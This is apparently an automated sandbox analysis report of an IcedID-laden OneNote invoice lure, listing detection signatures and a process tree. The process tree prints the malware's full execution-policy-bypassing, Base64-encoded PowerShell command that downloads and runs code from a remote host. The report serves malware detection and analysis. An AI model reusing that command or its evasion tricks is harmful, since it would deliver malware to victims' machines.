Windows
Analysis Report
Inv_02_02_#6.one
Overview
General Information
Detection
IcedID
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- ONENOTE.EXE (PID: 1972, cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one", MD5: 8D7E99CB358318E1F38803C9E6B67867)
- ONENOTEM.EXE (PID: 2040, cmdline: /tsr, MD5: DBCFA6F25577339B877D2305CAD3DEC3)
- mshta.exe (PID: 2100, cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}, MD5: 7083239CE743FDB68DFC933B7308E80A)
- cmd.exe (PID: 1784, cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 3000, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)